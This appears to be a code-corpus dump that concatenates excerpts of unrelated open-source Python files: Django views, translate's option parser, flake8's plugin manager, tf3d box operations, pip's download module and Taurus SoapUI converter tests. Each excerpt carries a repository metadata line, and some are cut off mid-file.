return oDataOperation
def test_addAndRemove():
# just inserting one record
record = createAccountingRecord()
record.setStartTime()
| record.setEndTime()
res = gDataStoreClient.addRegister(record)
assert res['OK']
res = gDataStoreClient.commit()
assert res['OK']
# now removing that record
res = gDataStoreClient.remove(record)
assert res['OK']
|
kdimitrov92/Portfolio | portfolio/portfolio/views/comments.py | Python | gpl-2.0 | 789 | 0 | from django.shortcuts import redirect
from portfolio.models.comments import PhotoComment
from portfolio.mod | els.photos import Photo
from portfolio.views.base import AuthenticatedView
class CommentPhotoView(AuthenticatedView):
""" View that handles commenting on a photo """
def post(self, request):
comment_content = request.POST.get('comment', '')
photo = request.POST.get('photo', 0)
if comment_content and photo:
comment = PhotoComment(
photo=Photo.objects.get(id=photo),
owner=request.user,
content=comment_content |
)
comment.save()
if not photo:
return redirect('portfolio.home')
return redirect('portfolio.photo.view', photo_id=photo)
|
mail-apps/translate | translate/misc/optrecurse.py | Python | gpl-2.0 | 32,292 | 0.002044 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2002-2006 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import fnmatch
import logging
import optparse
import os.path
import re
import six
import sys
import traceback
from io import BytesIO
from translate import __version__
from translate.misc import progressbar
class ManPageOption(optparse.Option, object):
ACTIONS = optparse.Option.ACTIONS + ("manpage",)
def take_action(self, action, dest, opt, value, values, parser):
"""take_action that can handle manpage as well as standard actions"""
if action == "manpage":
parser.print_manpage()
sys.exit(0)
return super(ManPageOption, self).take_action(action, dest, opt, value,
values, parser)
class ManHelpFormatter(optparse.HelpFormatter):
def __init__(self,
indent_increment=0,
max_help_position=0,
width=80,
short_first=1):
optparse.HelpFormatter.__init__(
self, indent_increment, max_help_position, width, short_first)
def format_option_strings(self, option):
"""Return a comma-separated list of option strings & metavariables."""
if option.takes_value():
metavar = option.metavar or option.dest.upper()
metavar = '\\fI%s\\fP' % metavar
short_opts = [sopt + metavar for sopt in option._short_opts]
long_opts = [lopt + "\\fR=\\fP" + metavar for lopt in option._long_opts]
else:
short_opts = option._short_opts
long_opts = option._long_opts
if self.short_first:
opts = short_opts + long_opts
else:
opts = long_opts + short_opts
return '\\fB%s\\fP' % ("\\fR, \\fP".join(opts))
class RecursiveOptionParser(optparse.OptionParser, object):
"""A specialized Option Parser for recursing through directories."""
def __init__(self, formats, usetemplates=False, allowmissingtemplate=False,
description=None):
"""Construct the specialized Option Parser.
:type formats: Dictionary
:param formats: See :meth:`~.RecursiveOptionParser.setformats`
for an explanation of the formats parameter.
"""
optparse.OptionParser.__init__(self, version="%prog " + __version__.sver,
description=description)
self.setmanpageoption()
self.setprogressoptions()
self.seterrorleveloptions()
self.setformats(formats, usetemplates)
self.passthrough = []
self.allowmissingtemplate = allowmissingtemplate
logging.basicConfig(format="%(name)s: %(levelname)s: %(message)s")
def get_prog_name(self):
return os.path.basename(sys.argv[0])
def setmanpageoption(self):
"""creates a manpage option that allows the optionparser to generate a
manpage"""
manpageoption = ManPageOption(None, "--manpage", dest="manpage",
default=False, action="manpage",
help="output a manpage based on the help")
self.define_option(manpageoption)
def format_manpage(self):
"""returns a formatted manpage"""
result = []
prog = self.get_prog_name()
formatprog = lambda x: x.replace("%prog", prog)
formatToolkit = lambda x: x.replace("%prog", "Translate Toolkit")
result.append('.\\" Autogenerated manpage\n')
result.append('.TH %s 1 "%s" "" "%s"\n' % (prog,
formatToolkit(self.version),
formatToolkit(self.version)))
result.append('.SH NAME\n')
result.append('%s \\- %s\n' % (self.get_prog_name(),
self.description.split('\n\n')[0]))
result.append('.SH SYNOPSIS\n')
result.append('.PP\n')
usage = "\\fB%prog "
usage += " ".join([self.getusageman(option) for option in self.option_list])
usage += "\\fP"
result.append('%s\n' % formatprog(usage))
description_lines = self.description.split('\n\n')[1:]
if description_lines:
result.append('.SH DESCRIPTION\n')
result.append('\n\n'.join([re.sub('\.\. note::', 'Note:', l)
for l in description_lines]))
result.append('.SH OPTIONS\n')
ManHelpFormatter().store_option_strings(self)
result.append('.PP\n')
for option in self.option_list:
result.append('.TP\n')
result.append('%s\n' % str(option).replace('-', '\-'))
result.append('%s\n' % option.help.replace('-', '\-'))
return "".join(result)
def print_manpage(self, file=None):
"""outputs a manpage for the program using the help information"""
if file is None:
file = sys.stdout
file.write(self.format_manpage())
def set_usage(self, usage=None):
"""sets the usage string - if usage not given, uses getusagestring for
each option"""
if usage is None:
self.usage = "%prog " + " ".join([self.getusagestring(option) for option in self.option_list])
else:
super(RecursiveOptionParser, self).set_usage(usage)
def warning(self, msg, options=None, exc_info=None):
"""Print a warning message incorporating 'msg' to stderr and exit."""
if options:
if options.errorlevel == "traceback":
errorinfo = "\n".join(traceback.format_exception(exc_info[0],
exc_info[1], exc_info[2]))
elif options.errorlevel == "exception":
errorinfo = "\n".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
elif options.errorlevel == "message":
errorinfo = str(exc_info[1])
else:
errorinfo = ""
if errorinfo:
msg += ": " + errorinfo
logging.getLogger(self.get_prog_name()).warning(msg)
def getusagestring(self, option):
"""returns the usage string for the given option"""
optionstring = "|".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "[%s]" % optionstring
if option.metavar:
optionstring += " " + option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "[%s]" % optionstring
def getusageman(self, option):
"""returns the usage string for the given option"""
optionstring = "\\fR|\\fP".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "\\fR[\\fP%s\\fR]\\fP" % optionstring
if option.metavar:
optionstring += " \\fI%s\\fP" % option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "\\fR[\\fP%s\\fR]\\fP" % optionstring
def define_option(self, option):
"""Defines the given option, replacing an exi | sting one of the same short
name if neccessary..."""
for short_opt in option._short_opts:
if self.has_option(short_opt):
self.remove_option(short_opt)
for long_op | t in option._long_opts:
if self.has_option(long_opt):
self.remove_option(long_opt)
self.add_option(option)
|
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/flake8/plugins/manager.py | Python | mit | 17,752 | 0 | """Plugin loading and management logic and classes."""
import logging
import sys
import entrypoints
from flake8 import exceptions
from flake8 import utils
if sys.version_info >= (3, 3):
import collections.abc as collections_abc
else:
import collections as collections_abc
LOG = logging.getLogger(__name__)
__all__ = ("Checkers", "Plugin", "PluginManager", "ReportFormatters")
NO_GROUP_FOUND = object()
class Plugin(object):
"""Wrap an EntryPoint from setuptools and other logic."""
def __init__(self, name, entry_point, local=False):
"""Initialize our Plugin.
:param str name:
Name of the entry-point as it was registered with setuptools.
:param entry_point:
EntryPoint returned by setuptools.
:type entry_point:
setuptools.EntryPoint
:param bool local:
Is this a repo-local plugin?
"""
self.name = name
self.entry_point = entry_point
self.local = local
self._plugin = None
self._parameters = None
self._parameter_names = None
self._group = None
self._plugin_name = None
self._version = None
def __repr__(self):
"""Provide an easy to read description of the current plugin."""
return 'Plugin(name="{0}", entry_point="{1}")'.format(
self.name, self.entry_point
)
def to_dictionary(self):
"""Convert this plugin to a dictionary."""
return {
"name": self.name,
"parameters": self.parameters,
"parameter_names": self.parameter_names,
| "plugin": self.plugin,
"plugin_name": self | .plugin_name,
}
def is_in_a_group(self):
"""Determine if this plugin is in a group.
:returns:
True if the plugin is in a group, otherwise False.
:rtype:
bool
"""
return self.group() is not None
def group(self):
"""Find and parse the group the plugin is in."""
if self._group is None:
name = self.name.split(".", 1)
if len(name) > 1:
self._group = name[0]
else:
self._group = NO_GROUP_FOUND
if self._group is NO_GROUP_FOUND:
return None
return self._group
@property
def parameters(self):
"""List of arguments that need to be passed to the plugin."""
if self._parameters is None:
self._parameters = utils.parameters_for(self)
return self._parameters
@property
def parameter_names(self):
"""List of argument names that need to be passed to the plugin."""
if self._parameter_names is None:
self._parameter_names = list(self.parameters)
return self._parameter_names
@property
def plugin(self):
"""Load and return the plugin associated with the entry-point.
This property implicitly loads the plugin and then caches it.
"""
self.load_plugin()
return self._plugin
@property
def version(self):
"""Return the version of the plugin."""
if self._version is None:
if self.is_in_a_group():
self._version = version_for(self)
else:
self._version = self.plugin.version
return self._version
@property
def plugin_name(self):
"""Return the name of the plugin."""
if self._plugin_name is None:
if self.is_in_a_group():
self._plugin_name = self.group()
else:
self._plugin_name = self.plugin.name
return self._plugin_name
@property
def off_by_default(self):
"""Return whether the plugin is ignored by default."""
return getattr(self.plugin, "off_by_default", False)
def execute(self, *args, **kwargs):
r"""Call the plugin with \*args and \*\*kwargs."""
return self.plugin(*args, **kwargs) # pylint: disable=not-callable
def _load(self):
self._plugin = self.entry_point.load()
if not callable(self._plugin):
msg = (
"Plugin %r is not a callable. It might be written for an"
" older version of flake8 and might not work with this"
" version" % self._plugin
)
LOG.critical(msg)
raise TypeError(msg)
def load_plugin(self):
"""Retrieve the plugin for this entry-point.
This loads the plugin, stores it on the instance and then returns it.
It does not reload it after the first time, it merely returns the
cached plugin.
:returns:
Nothing
"""
if self._plugin is None:
LOG.info('Loading plugin "%s" from entry-point.', self.name)
try:
self._load()
except Exception as load_exception:
LOG.exception(load_exception)
failed_to_load = exceptions.FailedToLoadPlugin(
plugin=self, exception=load_exception
)
LOG.critical(str(failed_to_load))
raise failed_to_load
def enable(self, optmanager, options=None):
"""Remove plugin name from the default ignore list."""
optmanager.remove_from_default_ignore([self.name])
optmanager.extend_default_select([self.name])
if not options:
return
try:
options.ignore.remove(self.name)
except (ValueError, KeyError):
LOG.debug(
"Attempted to remove %s from the ignore list but it was "
"not a member of the list.",
self.name,
)
def disable(self, optmanager):
"""Add the plugin name to the default ignore list."""
optmanager.extend_default_ignore([self.name])
def provide_options(self, optmanager, options, extra_args):
"""Pass the parsed options and extra arguments to the plugin."""
parse_options = getattr(self.plugin, "parse_options", None)
if parse_options is not None:
LOG.debug('Providing options to plugin "%s".', self.name)
try:
parse_options(optmanager, options, extra_args)
except TypeError:
parse_options(options)
if self.name in options.enable_extensions:
self.enable(optmanager, options)
def register_options(self, optmanager):
"""Register the plugin's command-line options on the OptionManager.
:param optmanager:
Instantiated OptionManager to register options on.
:type optmanager:
flake8.options.manager.OptionManager
:returns:
Nothing
"""
add_options = getattr(self.plugin, "add_options", None)
if add_options is not None:
LOG.debug(
'Registering options from plugin "%s" on OptionManager %r',
self.name,
optmanager,
)
add_options(optmanager)
if self.off_by_default:
self.disable(optmanager)
class PluginManager(object): # pylint: disable=too-few-public-methods
"""Find and manage plugins consistently."""
def __init__(self, namespace, local_plugins=None):
"""Initialize the manager.
:param str namespace:
Namespace of the plugins to manage, e.g., 'flake8.extension'.
:param list local_plugins:
Plugins from config (as "X = path.to:Plugin" strings).
"""
self.namespace = namespace
self.plugins = {}
self.names = []
self._load_local_plugins(local_plugins or [])
self._load_entrypoint_plugins()
def _load_local_plugins(self, local_plugins):
"""Load local plugins from config.
:param list local_plugins:
Plugins from config (as "X = path.to:Plugin" strings).
"""
for plugin_str in local_plugins:
name, _, entry_str = plugin_str.partition("=")
name, entry_str = name.strip(), entry_str.strip()
|
google-research/google-research | tf3d/object_detection/box_utils/np_box_list_ops.py | Python | apache-2.0 | 21,691 | 0.006454 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bounding Box List operations for Numpy BoxList3d's.
Example box operations that are supported:
* Volumes: compute bounding box volume
* IOU: pairwise intersection-over-union scores
"""
import numpy as np
from tf3d.object_detection.box_utils import np_box_list
from tf3d.object_detection.box_utils import np_box_ops
class SortOrder(object):
"""Enum class for sort order.
Attributes:
ascend: ascend order.
descend: descend order.
"""
ASCEND = 1
DESCEND = 2
def copy_boxlist(boxlist, indices=None):
"""Copy the boxes of a BoxList3d object into a new BoxList3d object.
Args:
boxlist: A np_box_list.BoxList3d object.
indices: A indices of the boxes to be copied. It is not used if None.
Returns:
new_boxlist: A new np_box_list.BoxList3d object.
"""
length = boxlist.get_length()
height = boxlist.get_height()
width = boxlist.get_width()
center_x = boxlist.get_center_x()
center_y = boxlist.get_center_y()
center_z = boxlist.get_center_z()
rotation_matrix = boxlist.get_rotation_matrix()
rotation_z_radians = boxlist.get_rotation_z_radians()
if indices is not None:
length = length[indices]
height = height[indices]
width = width[indices]
center_x = center_x[indices]
center_y = center_y[indices]
center_z = center_z[indices]
if rotation_matrix is not None:
rotation_matrix = rotation_matrix[indices, :, :]
if rotation_z_radians is not None:
rotation_z_radians = rotation_z_radians[indices]
new_boxlist = np_box_list.BoxList3d(
length=length,
height=height,
width=width,
center_x=center_x,
center_y=center_y,
center_z=center_z,
rotation_matrix=rotation_matrix,
rotation_z_radians=rotation_z_radians)
return new_boxlist
def volume(boxlist):
"""Computes area of boxes.
Args:
boxlist: BoxList3d holding N boxes.
Returns:
A numpy array with shape [N*1] representing box volumes.
"""
return np_box_ops.volume(
length=boxlist.get_length(),
height=boxlist.get_height(),
width=boxlist.get_width())
def intersection3d(boxlist1, boxlist2):
"""Computes pairwise intersection areas between boxes.
Args:
boxlist1: BoxList3d holding N boxes.
boxlist2: BoxList3d holding M boxes.
Returns:
a numpy array with shape [N*M] representing pairwise intersection area
"""
boxlist1_rotation_matrix = boxlist1.get_rotation_matrix()
boxlist2_rotation_matrix = boxlist2.get_rotation_matrix()
if (boxlist1_rotation_matrix is not None) and (boxlist2_rotation_matrix is
not None):
return np_box_ops.intersection3d_9dof_box(
boxes1_length=boxlist1.get_length(),
boxes1_height=boxlist1.get_height(),
boxes1_width=boxlist1.get_width(),
boxes1_center=boxlist1.get_center(),
boxes1_rotation_matrix=boxlist1_rotation_matrix,
boxes2_length=boxlist2.get_length(),
boxes2_height=boxlist2.get_height(),
boxes2_width=boxlist2.get_width(),
boxes2_center=boxlist2.get_center(),
boxes2_rotation_matrix=boxlist2_rotation_matrix)
else:
return np_box_ops.intersection3d_7dof_box(
boxes1_length=boxlist1.get_length(),
boxes1_height=boxlist1.get_height(),
boxes1_width=boxlist1.get_width(),
boxes1_center=boxlist1.get_center(),
boxes1_rotation_z_radians=boxlist1.get_rotation_z_radians(),
boxes2_length=boxlist2.get_length(),
boxes2_height=boxlist2.get_height(),
boxes2_width=boxlist2.get_width(),
boxes2_center=boxlist2.get_center(),
boxes2_rotation_z_radians=boxlist2.get_rotation_z_radians())
def iou3d(boxlist1, boxlist2):
"""Computes pairwise intersection-over-union between box collections.
Args:
boxlist1: BoxList3d holding N boxes.
boxlist2: BoxList3d holding M boxes.
Returns:
a numpy array with shape [N, M] representing pairwise iou scores.
"""
boxlist1_rotation_matrix = boxlist1.get_rotation_matrix()
boxlist2_rotation_matrix = boxlist2.get_rotation_matrix()
if (boxlist1_rotation_matrix is not None) and (boxlist2_rotation_matrix is
not None):
return np_box_ops.iou3d_9dof_box(
boxes1_length=boxlist1.get_length(),
boxes1_height=boxlist1.get_height(),
boxes1_width=boxlist1.get_width(),
boxes1_center=boxlist1.get_center(),
boxes1_rotation_matrix=boxlist1.get_rotation_matrix(),
boxes2_length=boxlist2.get_length(),
boxes2_height=boxlist2.get_height(),
boxes2_width=boxlist2.get_width(),
boxes2_center=boxlist2.get_center(),
boxes2_rotation_matrix=boxlist2.get_rotation_matrix())
else:
return np_box_ops.iou3d_7dof_box(
boxes1_length=boxlist1.get_length(),
boxes1_height=boxlist1.get_height(),
boxes1_width=boxlist1.get_width(),
boxes1_center=boxlist1.get_center(),
boxes1_rotation_z_radians=boxlist1.get_rotation_z_radians(),
boxes2_length=boxlist2.get_length(),
boxes2_height=boxlist2.get_height(),
boxes2_width=boxlist2.get_width(),
boxes2_center=boxlist2.get_center(),
boxes2_rotation_z_radians=boxlist2.get_rotation_z_radians())
def iov3d(boxlist1, boxlist2):
"""Computes pairwise intersection-over-volume between box collections.
Args:
boxlist1: BoxList3d holding N boxes.
boxlist2: BoxList3d holding M boxes.
Returns:
a numpy array with shape [N, M] representing pairwise iov scores.
"""
boxlist1_rotation_matrix = boxlist1.get_rota | tion_matrix()
boxlist2_ | rotation_matrix = boxlist2.get_rotation_matrix()
if (boxlist1_rotation_matrix is not None) and (boxlist2_rotation_matrix is
not None):
return np_box_ops.iov3d_9dof_box(
boxes1_length=boxlist1.get_length(),
boxes1_height=boxlist1.get_height(),
boxes1_width=boxlist1.get_width(),
boxes1_center=boxlist1.get_center(),
boxes1_rotation_matrix=boxlist1.get_rotation_matrix(),
boxes2_length=boxlist2.get_length(),
boxes2_height=boxlist2.get_height(),
boxes2_width=boxlist2.get_width(),
boxes2_center=boxlist2.get_center(),
boxes2_rotation_matrix=boxlist2.get_rotation_matrix())
else:
return np_box_ops.iov3d_7dof_box(
boxes1_length=boxlist1.get_length(),
boxes1_height=boxlist1.get_height(),
boxes1_width=boxlist1.get_width(),
boxes1_center=boxlist1.get_center(),
boxes1_rotation_z_radians=boxlist1.get_rotation_z_radians(),
boxes2_length=boxlist2.get_length(),
boxes2_height=boxlist2.get_height(),
boxes2_width=boxlist2.get_width(),
boxes2_center=boxlist2.get_center(),
boxes2_rotation_z_radians=boxlist2.get_rotation_z_radians())
def nuscenes_center_distance_measure(boxlist1, boxlist2):
"""Computes pairwise intersection-over-volume between box collections.
Args:
boxlist1: BoxList3d holding N boxes.
boxlist2: BoxList3d holding M boxes.
Returns:
A numpy array with shape [N, M] representing pairwise closeness scores
based on center distance.
"""
boxes1_center = boxlist1.get_center()
boxes2_center = boxlist2.get_center()
boxes1_center_xy = boxes1_center[:, 0:2]
boxes2_center_xy = boxes2_center[:, 0:2]
distances = np.linalg.norm(
np.expand_dims(boxes1_center_xy, axis=1) -
np.expand_dims(boxes2_center_xy, axis=0),
axis=2)
return 1.0 / |
ppyordanov/HCI_4_Future_Cities | Server/src/virtualenv/Lib/site-packages/pip/download.py | Python | mit | 22,573 | 0.000487 | import cgi
import email.utils
import hashlib
import getpass
import mimetypes
import os
import platform
import re
import shutil
import sys
import tempfile
import pip
from pip.backwardcompat import urllib, urlparse, raw_input
from pip.exceptions import InstallationError, HashMismatch
from pip.util import (splitext, rmtree, format_size, display_path,
backup_dir, ask_path_exists, unpack_file,
create_download_cache_folder, cache_download)
from pip.vcs import vcs
from pip.log import logger
from pip._vendor import requests, six
from pip._vendor.requests.adapters import BaseAdapter
from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth
from pip._vendor.requests.compat import IncompleteRead
from pip._vendor.requests.exceptions import InvalidURL, ChunkedEncodingError
from pip._vendor.requests.models import Response
from pip._vendor.requests.structures import CaseInsensitiveDict
__all__ = ['get_file_content',
'is_url', 'url_to_path', 'path_to_url',
'is_archive_file', 'unpack_vcs_link',
'unpack_file_url', 'is_vcs_url', 'is_file_url', 'unpack_http_url']
def user_agent():
"""Return a string representing the user agent."""
_implementation = platform.python_implementation()
if _implementation == 'CPython':
_implementation_version = platform.python_version()
elif _implementation == 'PyPy':
_implementation_version = '%s.%s.%s' % (sys.pypy_version_info.major,
sys.pypy_version_info.minor,
sys.pypy_version_info.micro)
if sys.pypy_version_info.releaselevel != 'final':
_implementation_version = ''.join([
_implementation_version,
sys.pypy_version_info.releaselevel,
])
elif _implementation == 'Jython':
_implementation_version = platform.python_version() # Complete Guess
elif _implementation == 'IronPython':
_implementation_version = platform.python_version() # Complete Guess
else:
_implementation_version = 'Unknown'
try:
p_system = platform.system()
p_release = platform.release()
except IOError:
p_system = 'Unknown'
p_release = 'Unknown'
return " ".join(['pip/%s' % pip.__version__,
'%s/%s' % (_implementation, _implementation_version),
'%s/%s' % (p_system, p_release)])
class MultiDomainBasicAuth(AuthBase):
def __init__(self, prompting=True):
self.prompting = prompting
self.passwords = {}
def __call__(self, req):
parsed = urlparse.urlparse(req.url)
# Get the netloc without any embedded credentials
netloc = parsed.netloc.split("@", 1)[-1]
# Set the url of the request to the url without any credentials
req.url = urlparse.urlunparse(parsed[:1] + (netloc,) + parsed[2:])
# Use any stored credentials that we have for this netloc
username, password = self.passwords.get(netloc, (None, None))
# Extract credentials embedded in the url if we have none stored
if username is None:
username, password = self.parse_credentials(parsed.netloc)
if username or password:
# Store the username and password
self.passwords[netloc] = (username, password)
# Send the basic auth with this request
req = HTTPBasicAuth(username or "", password or "")(req)
# Attach a hook to handle 401 responses
req.register_hook("response", self.handle_401)
return req
def handle_401(self, resp, **kwargs):
# We | only care about 401 responses, anything else we want to just
# pass through the actual response
if resp.status_code != 401:
return resp
# We are not able to prompt the user so simple return the response
if not self.prompting:
return resp
parsed = urlparse.urlparse(resp.url)
# Prompt the user for a new username and password
username = raw_input("User for %s: " % pars | ed.netloc)
password = getpass.getpass("Password: ")
# Store the new username and password to use for future requests
if username or password:
self.passwords[parsed.netloc] = (username, password)
# Consume content and release the original connection to allow our new
# request to reuse the same one.
resp.content
resp.raw.release_conn()
# Add our new username and password to the request
req = HTTPBasicAuth(username or "", password or "")(resp.request)
# Send our new request
new_resp = resp.connection.send(req, **kwargs)
new_resp.history.append(resp)
return new_resp
def parse_credentials(self, netloc):
if "@" in netloc:
userinfo = netloc.rsplit("@", 1)[0]
if ":" in userinfo:
return userinfo.split(":", 1)
return userinfo, None
return None, None
class LocalFSResponse(object):
def __init__(self, fileobj):
self.fileobj = fileobj
def __getattr__(self, name):
return getattr(self.fileobj, name)
def read(self, amt=None, decode_content=None, cache_content=False):
return self.fileobj.read(amt)
# Insert Hacks to Make Cookie Jar work w/ Requests
@property
def _original_response(self):
class FakeMessage(object):
def getheaders(self, header):
return []
def get_all(self, header, default):
return []
class FakeResponse(object):
@property
def msg(self):
return FakeMessage()
return FakeResponse()
class LocalFSAdapter(BaseAdapter):
def send(self, request, stream=None, timeout=None, verify=None, cert=None,
proxies=None):
parsed_url = urlparse.urlparse(request.url)
# We only work for requests with a host of localhost
if parsed_url.netloc.lower() != "localhost":
raise InvalidURL("Invalid URL %r: Only localhost is allowed" %
request.url)
real_url = urlparse.urlunparse(parsed_url[:1] + ("",) + parsed_url[2:])
pathname = url_to_path(real_url)
resp = Response()
resp.status_code = 200
resp.url = real_url
stats = os.stat(pathname)
modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
resp.headers = CaseInsensitiveDict({
"Content-Type": mimetypes.guess_type(pathname)[0] or "text/plain",
"Content-Length": stats.st_size,
"Last-Modified": modified,
})
resp.raw = LocalFSResponse(open(pathname, "rb"))
resp.close = resp.raw.close
return resp
def close(self):
pass
class PipSession(requests.Session):
timeout = None
def __init__(self, *args, **kwargs):
super(PipSession, self).__init__(*args, **kwargs)
# Attach our User Agent to the request
self.headers["User-Agent"] = user_agent()
# Attach our Authentication handler to the session
self.auth = MultiDomainBasicAuth()
# Enable file:// urls
self.mount("file://", LocalFSAdapter())
def request(self, method, url, *args, **kwargs):
# Make file:// urls not fail due to lack of a hostname
parsed = urlparse.urlparse(url)
if parsed.scheme == "file":
url = urlparse.urlunparse(parsed[:1] + ("localhost",) + parsed[2:])
# Allow setting a default timeout on a session
kwargs.setdefault("timeout", self.timeout)
# Dispatch the actual request
return super(PipSession, self).request(method, url, *args, **kwargs)
def get_file_content(url, comes_from=None, session=None):
"""Gets the content of a file; it may be a filename, file: URL, or
http: URL. Returns (location, content). Content is unicode."""
if session is None:
session = PipSession()
match = _scheme_re.search(url)
if match:
|
Blazemeter/taurus | tests/unit/modules/test_SoapUI.py | Python | apache-2.0 | 7,842 | 0.00204 | from bzt.utils import SoapUIScriptConverter
from tests.unit import BZTestCase, RESOURCES_DIR, ROOT_LOGGER
class TestSoapUIConverter(BZTestCase):
def test_minimal(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
self.assertIn("execution", config)
self.assertEqual(4, len(config["execution"]))
execution = config["execution"][1]
self.assertEqual("TestSuite 1-index", execution.get("scenario"))
self.assertEqual(60, execution.get("hold-for"))
self.assertEqual(10, execution.get("concurrency"))
self.assertIn("scenarios", config)
self.assertIn("TestSuite 1-index", config["scenarios"])
scenario = config["scenarios"]["TestSuite 1-index"]
self.assertIn("requests", scenario)
self.assertEqual(3, len(scenario["requests"]))
self.assertIn("variables", scenario)
self.assertEqual("foo", scenario["variables"].get("something"))
self.assertEqual("2", scenario["variables"].get("something_else"))
self.assertEqual("json", scenario["variables"].get("route_part"))
first_req = scenario["requests"][0]
self.assertEqual("http://blazedemo.com/reserve.php", first_req["url"])
self.assertEqual("test index", first_req["label"])
self.assertIn("headers", first_req)
self.assertEqual(first_req["headers"].get("X-Custom-Header"), "Value")
self.assertIn("assert", first_req)
self.assertEqual(2, len(first_req["assert"]))
self.assertEqual("BlazeDemo", first_req["assert"][0]["contains"][0])
self.assertFalse(first_req["assert"][0]["not"])
self.assertFalse(first_req["assert"][0]["regexp"])
self.assertEqual("BlazeDemou", first_req["assert"][1]["contains"][0])
self.assertTrue(first_req["assert"][1]["not"])
self.assertTrue(first_req["assert"][1]["regexp"])
second_req = scenario["requests"][1]
self.assertEqual("http://example.com/body", second_req["url"])
self.assertEqual("posty", second_req["label"])
self.assertEqual("POST", second_req["method"])
self.assertIn("headers", second_req)
self.assertEqual(second_req["headers"].get("X-Header"), "X-Value")
self.assertEqual(second_req["headers"].get("X-Header-2"), "X-Value-2")
self.assertIn("body", second_req)
self.assertIn("answer", second_req["body"])
self.assertEqual('42', second_req["body"]["answer"])
self.assertIn("extract-xpath", second_req)
self.assertIn("something_else", second_req["extract-xpath"])
self.assertEqual("//head", second_req["extract-xpath"]["something_else"]["xpath"])
third_req = scenario["requests"][2]
self.assertEqual("http://localhost:9999/api/${route_part}", third_req["url"])
self.assertEqual("/api/json", third_req["label"])
self.assertIn("extract-jsonpath", third_req)
self | .assertIn("something", third_req["extract-jsonpath"])
self.assertEqual("$.baz", third_req["extract-jsonpath"]["something"]["jsonpath"])
def test_find_test_case(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
scenarios = config["scenarios"]
self.assertEqual(len(scenarios), 4)
target_scenario = scenarios["TestSuite 1-index"]
found_name, found_scenario = obj.find_soapui_test_c | ase("index", scenarios)
self.assertEqual(target_scenario, found_scenario)
def test_find_test_case_empty(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
self.sniff_log(obj.log)
config = obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
scenarios = config["scenarios"]
self.assertEqual(len(scenarios), 4)
target_scenario = scenarios["BlazeDemo LoadTest"]
found_name, found_scenario = obj.find_soapui_test_case(None, scenarios)
self.assertEqual(target_scenario, found_scenario)
def test_skip_if_no_requests(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
self.sniff_log(obj.log)
obj.convert_script(RESOURCES_DIR + "soapui/project.xml")
self.assertIn("No requests extracted for scenario TestSuite 1-EmptyTestCase, skipping it",
self.log_recorder.warn_buff.getvalue())
def test_rest_service_name_as_base_address(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/youtube-sample.xml")
scenarios = config["scenarios"]
scenario = scenarios["TestSuite-TestCase"]
self.assertEqual(len(scenario["requests"]), 5)
for request in scenario["requests"]:
self.assertTrue(request["url"].startswith("http://gdata.youtube.com/"))
def test_project_suite_case_level_properties(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/flickr-sample.xml")
scenarios = config["scenarios"]
scenario = scenarios["TestSuite-TestCase"]
self.assertEqual(len(scenario["variables"]), 2)
self.assertIn("#Project#ApiKey", scenario["variables"])
self.assertIn("#TestCase#temp", scenario["variables"])
def test_rest_parameters(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/flickr-sample.xml")
scenarios = config["scenarios"]
scenario = scenarios["TestSuite-TestCase"]
self.assertEqual(len(scenario["requests"]), 4)
first = scenario["requests"][0]
self.assertIn("body", first)
self.assertEqual(len(first["body"]), 4)
self.assertTrue(all(key in first["body"] for key in ["format", "method", "nojsoncallback", "api_key"]))
def test_soap_conversion(self):
obj = SoapUIScriptConverter(ROOT_LOGGER)
config = obj.convert_script(RESOURCES_DIR + "soapui/globalweather.xml")
self.assertEqual(len(config["scenarios"]), 4)
merged = config["scenarios"]["GWSOAPMerged-Test"]
split1 = config["scenarios"]["GWSOAPSplit-GetCities"]
split2 = config["scenarios"]["GWSOAPSplit-GetWeather"]
self.assertEqual(len(merged["requests"]), 2)
self.assertEqual(merged["requests"][0]["url"], "http://www.webservicex.com/globalweather.asmx")
self.assertEqual(merged["requests"][0]["method"], "POST")
self.assertEqual(merged["requests"][0]["headers"]["Content-Type"], "text/xml; charset=utf-8")
self.assertIn("body", merged["requests"][0])
self.assertEqual(merged["requests"][1]["url"], "http://www.webservicex.com/globalweather.asmx")
self.assertEqual(len(split1["requests"]), 1)
self.assertEqual(split1["requests"][0]["url"], "http://www.webservicex.com/globalweather.asmx")
self.assertEqual(len(split2["requests"]), 1)
self.assertEqual(split2["requests"][0]["url"], "http://www.webservicex.com/globalweather.asmx")
def test_rest_templated_params_interpolation(self):
